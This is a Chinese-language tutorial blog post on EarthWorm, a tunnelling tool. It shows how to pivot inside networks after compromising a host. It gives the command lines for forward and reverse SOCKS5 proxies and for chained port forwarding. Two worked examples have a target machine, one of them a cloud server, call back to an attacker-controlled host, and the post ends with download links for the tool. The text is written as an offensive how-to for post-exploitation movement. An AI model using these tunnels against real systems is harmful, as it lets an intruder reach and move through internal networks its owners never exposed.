0x00 前言
當(dāng)你在內(nèi)網(wǎng)滲透,并且拿下一臺機(jī)器的權(quán)限時,你是不是覺得已經(jīng)算是一次完整的滲透了?
不來一次內(nèi)網(wǎng)漫游,滲透是不完整的,哈哈。
本文給大家推薦一款內(nèi)網(wǎng)穿透神器EarthWorm,(簡稱EW)是一套輕量便攜且功能強(qiáng)大的網(wǎng)絡(luò)穿透工具,基于標(biāo)準(zhǔn)C開發(fā),具有socks5代理、端口轉(zhuǎn)發(fā)和端口映射三大功能。
它強(qiáng)在哪些方面呢?
1.可穿透復(fù)雜的內(nèi)網(wǎng)環(huán)境。(這么說吧:我本地連著路由器開一個虛擬機(jī),可以直接反彈到公網(wǎng)的云服務(wù)器上。)
2.以支持多平臺間的轉(zhuǎn)接通訊,Linux、Windows、MacOS、Arm-Linux均支持。
支持平臺列表:(可跨平臺反彈)
1. ew_for_Win.exe 適用各種Windows系統(tǒng)(X86指令集、X64指令集) Windows7、Windows XP
2. ew_for_Linux32 各常見Linux發(fā)行版 (X86 指令集 CPU) Ubuntu(X86)/BT5(X86)
3. ew_for_linux64 各常見Linux發(fā)行版 (X64 指令集 CPU) Ubuntu(X64)/Kali(X64)
4. ew_for_MacOSX64 MacOS系統(tǒng)發(fā)行版 (X64 指令集) 蘋果PC電腦,蘋果server
5. ew_for_Arm32 常見Arm-Linux系統(tǒng) HTC New One(Arm-Android)/小米路由器(R1D)
6. ew_mipsel 常見Mips-Linux系統(tǒng) (Mipsel指令集 CPU) 螢石硬盤錄像機(jī)、小米mini路由器(R1CM)
0x01 使用方法
以下所有樣例,如無特殊說明代理端口均為1080,服務(wù)均為SOCKSv5代理服務(wù).
該工具共有 6 種命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。
1.正向SOCKS v5服務(wù)器
$ ./ew -s ssocksd -l 1080
2. 反彈 SOCKS v5 服務(wù)器
這個操作具體分兩步:
a) 先在一臺具有公網(wǎng) ip 的主機(jī)A上運(yùn)行以下命令:
$ ./ew -s rcsocks -l 1080 -e 8888
b) 在目標(biāo)主機(jī)B上啟動 SOCKS v5 服務(wù) 并反彈到公網(wǎng)主機(jī)的 8888端口
$ ./ew -s rssocks -d 1.1.1.1 -e 8888
成功。
3. 多級級聯(lián)
工具中自帶的三條端口轉(zhuǎn)發(fā)指令,它們的參數(shù)格式分別為:
1. $ ./ew -s lcx_listen -l 1080 -e 8888
2. $ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
3. $ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
通過這些端口轉(zhuǎn)發(fā)指令可以將處于網(wǎng)絡(luò)深層的基于TCP的服務(wù)轉(zhuǎn)發(fā)至根前,比如 SOCKS v5。
首先提供兩個“二級級聯(lián)”本地SOCKS測試樣例:
a) lcx_tran 的用法
1. $ ./ew -s ssocksd -l 9999
2. $ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
b) lcx_listen、lcx_slave 的用法
1. $ ./ew -s lcx_listen -l 1080 -e 8888
2. $ ./ew -s ssocksd -l 9999
3. $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
再提供一個“三級級聯(lián)”的本地SOCKS測試用例以供參考
1. $ ./ew -s rcsocks -l 1080 -e 8888
2. $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
3. $ ./ew -s lcx_listen -l 9999 -e 7777
4. $ ./ew -s rssocks -d 127.0.0.1 -e 7777
數(shù)據(jù)流向:SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks
0x02 實戰(zhàn)測試(分為本地測試和公網(wǎng)IP測試)
一般最常用的就是上面的第二條:反彈 SOCKS v5 服務(wù)器。
使用實例1:
目標(biāo)機(jī)器:
ew.exe -s rssocks -d 2.2.2.2 -e 888
(2.2.2.2為想要反彈到的機(jī)器)
攻擊機(jī)器:
ew.exe -s rcsocks -l 1008 -e 888
(監(jiān)聽888端口,轉(zhuǎn)發(fā)到1008端口)
測試環(huán)境:
在這里我直接用我的本機(jī)Win10作為目標(biāo)機(jī)器,將虛擬機(jī)Win7作為攻擊機(jī)器。
本機(jī)Win10 ip:192.168.62.1
Win7 ip:192.168.62.128
ew_for_Win.exe -s rcsocks -l 1008 -e 888
接收888端口的數(shù)據(jù)并轉(zhuǎn)發(fā)到1008端口。
此時正在監(jiān)聽。
目標(biāo)機(jī)器Win10運(yùn)行命令:
ew_for_Win.exe -s rssocks -d 192.168.62.128 -e 888
此時攻擊機(jī)器會彈出連接成功的提示:
好了,到此Win10的SOCKS5代理就反彈到Win7攻擊機(jī)上了。
只需要一個Socks5連接工具就可以連接到本地1008端口來代理訪問了。
推薦工具SocksCap64。
在代理處配置127.0.0.1:1008,代理已連接。
使用實例2:
攻擊者洛杉磯 Linux VPS :45.78.*.*
目標(biāo)阿里云服務(wù)器 Win2008:47.93.*.*
攻擊者Linux監(jiān)聽:
[root@centos6 ~]# ./ew_for_Linux32 -s rcsocks -l 1008 -e 888
目標(biāo)阿里云服務(wù)器反彈:
ew_for_Win.exe -s rssocks -d 45.78.*.* -e 888
攻擊機(jī)器監(jiān)聽出現(xiàn):rssocks cmd_socket OK!
表示反彈成功。
0x03 工具下載
http://rootkiter.com/EarthWorm/download/ew.zip
http://sw.bos.baidu.com/sw-search-sp/software/b4a67d595e031/sockscap64w_V3.3_setup.exe
相關(guān)教程:
EarthWorm(ew):復(fù)雜網(wǎng)絡(luò)環(huán)境下內(nèi)網(wǎng)穿透、端口轉(zhuǎn)發(fā)及SOCKS5代理工具[
17]
http://21706.oa22.cn
該文章在 2023/10/21 16:05:46 編輯過
400 186 1886
